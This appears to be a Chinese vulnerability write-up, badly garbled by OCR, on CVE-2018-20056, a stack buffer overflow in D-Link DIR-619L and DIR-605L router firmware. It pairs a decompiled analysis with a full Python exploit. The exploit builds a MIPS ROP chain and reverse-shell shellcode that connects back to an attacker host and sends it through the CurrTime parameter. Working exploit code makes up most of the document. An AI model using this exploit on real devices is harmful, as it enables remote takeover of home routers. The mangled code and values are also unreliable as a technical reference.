（CVE-2018-20056）D-Link DIR-619L&605L 栈溢出漏洞.docx

(CVE-2018-20056) D-Link DIR-619L&605L 栈溢出漏洞一、漏洞简介D-LINK 的 D1R-619L Rev.B 2.06B1 版本之前和 DIR-605L Rev.B 2.12B1 版本之前的 设备，在binboa文件的formLanguage函数中存在缓冲区溢出漏洞，在调用 sprintf函数时没有对参数的长度进行检查，导致远程攻击者可以通过访问http:/ipZgoformZformLanguageChange 并指定 CurrTime 参数实现远程代码执行。固件下载地址：ftp:/二、漏洞影响D-LINK 的 DIR-619L Rev.B 2.06B1 版本之前和 DIR-605L Rev.B 2.12B1 版本之前的 设备。三、复现过程漏洞分析在 formLanguageChange 函数中，通过 WebsGetVar 获取 config.i 18n.language, nextPage, CUrrTime 等参数。WebSGetVar 通过 malloc、memcpy 将获取到的参数 返回给 formLanguageChange。formLanguageChange 接下来调用了 SPrintf 危险函 数向IOCaLf8变量中读入参数内容，并在下一步WebsRedirect使用了 localJ8作为 参数。void formLanguageChange(undefined4 uParml)(int iVarl;char *pcVar2;undefined4 UVar'3;FILE *_stream;char *_si;char local_f8 200;char acStack48 24;undefined4 local_18;int local_14;_si = (char *)websGetVar(uParml"config.il8n-language"jSDAT_004ac87 4)apmib_set(0x129,&local_18);_si = (char *)websGetVar(uParml ,nextPage,jSDAT_004ac874);if (*_sl = 0) Var3 = WebSGetVar(UParmIJclIrrTime”,&DAT_004ac874);获取 currTime参数 else si = "/index.asp"sprintf (Iocal-f8j "%sPt=%s,_sl,uVar3);危险函数 sprintf 直接读入字符 LAB_00460b34:WebsRedirect(uParml,local_f8);return;)WebSRedireCt主要调用send_r_moved_perm,这个函数调用了两次危险函数 sprintf,分另IJ 向 acStack224(sp+0xl9f8-0xe0)fll acStack480(sp+0xl9f8-0xle0) 输入字符。undefined4 websRedirect(int iParml,char *pcParm2) (char *pcVarl;*(undefined4 *)(iParml + 0x50) = 0;pcVarl = strstr(pcParm2j"apply-setting.asp");if (pcVarl != (char *)0x0) apply_setting_redirect = apply_setting_redirect + 1;)send_r_moved_perm(iParml,pcParm2);return 0;void send_r_moved_perm(int iParmlchar *pcParm2)(undefined4 uVarl;char *pcVar2;undefined auStack6624 6144;char acStack480 256;char acStack224 200;if (pcVar2 = (char *)0x0) if (*pcParm2 = '/') pcParm2 = pcParm2 + 1;sprintf(acStack224,"http:/%s%s"?*(undefined4 *)(iParml + 0x70)jpc Parm2);pcParm2 = acStack224;sprintf(acStack4804<html><head><head><body>rnttThis document has moved to a new <ahref="%s">location<a>.rnttPlease update your documents t o reflect the newlocation.rntt<body><html>rn”jpcParm2);.sreturn;)通过第二两个SPrintf修改返回地址，构造ROP链，导致程序控制流被劫持。(也 可以通过两个sprintf的配合来实现栈的迁移，漏洞作者是这么实现的)漏洞复现pocimport requestsimport sysimport structfrom pwn import *#context.log-level=,debug,context.arch='mips'context. endian=,big'ip='192.168.75.150,def syscmdl(a):p=remote(ipj80)z=len(a)print ,+len:"+str(z)payload=''payload+="POST goformfOrmLanguageChange HTTPl.lrn'payload+='Host: ,+ip+'rn,payload+=,Connection: keep-alivern,payload+='Accept-Encoding: gzipj deflatern,payload+='Accept: *rn,payload+='User-Agent: python-requests/2.18.4rn'payload+="Content-Length: '+str(z+9)+,rn'payload+='Content-Type: applicationx-www-form-urlencodedrn'payload+=,rn,payload+=,currTime=,payload+=a+,rn,p.send(payload)p.recvuntil('<html>')#raw_input()p.close()#base address of Iibc.so.0basel=0×2ab88000#shellcodeSc=Struct. pack(">I',j 0x24060101)sc+=struct.pack(">I",0x04d0ffff) sc+=struct .pack(',>I", 0x2806ffff) sc+=struct.pack(">I,0x27bdffe) sc+=struct .pack(, >1", 0x27e41001) sc+=struct.pack(">I",0x2484f023) sc+=struct.pack(">I",0×afa4ffe8) sc+=struct.pack(">1",0×afa0ffec) sc+=struct.pack(">I",0×27a5ffe8) sc+=struct.pack(">I",0x24020fab) sc+=struct.pack(">1",0xafa00108) sc+=struct. pack (, >1" j 0x0101010c ) sc+=,7binsh×00" shellcode =',shellcode += asm(shellcraft.connect('192.168.75.149,5555)shellcode += asm(shellcraft.dup2(5j0)shellcode += asm(Shellcraft.dup2(5j1) shellcode += scs0=struct.pack(">I'basel+0x2C794)Sl=Struct.pack(">I"jbasel+0x2C794)# rop2:move $t9,$s2；jr $t9s2=struct.pack(">I"jbasel+0x24b70)# rop3:sleep(l)s3=struct.pack(">I"jbasel+0x2bdac)# rop5:addiu $a0,$sp,0xl8;.；IW $r a,0×30;jr $ras4=struct .pack('>>I,basel+0x2bdac)#roppayloadl="a,*0xl67+s0+sl+s2+s3payloadl+=struct.pack(,>I",basel+0×25714) #ropl: Ii $a0,l;move $t9, $sl;jalr $t9;ori $al,js0,2payloadl+'b"*0×lc+s0+sl+s2+s3+s4payloadl+=struct.pack(">1",basel+0×5f98) #rop4:Iw $ra,0xlc($sp);.; jr $ra payloadl+='c,*0xlc payloadl+=s3payloadl+=,d,*0x18payloadl+=struct.pack(',>1",0x24910101) #rop7 addiu $sl,$a0,257;addi-257;move $t9,Ssljjalr $t9payloadl+=struct.pack(">I",0×2231feff)payloadl+=struct.pack(">I",0×0220c821)payloadl+=struct.pack(">1",0x0320f809)payloadl+=struct.pack(">I",0×2231feff)payloadl+=struct.pack(">I",0x2231feff)payloadl+=struct. pack(',>1", basel+0×2bda) #rop6:mov $t9,$a0;.; jalr $t9payloadl+='e'*0×20+shellcodeif _name_ = "_main_,: syscmdl(payloadl)利用效果:2018-2MS6S python DIR-6191.py Opening connection to 192.168.7S.150 on port 86: Done len:7441 ClOSed COnneCtton to ，92.168.7S.15。 DOrt 8。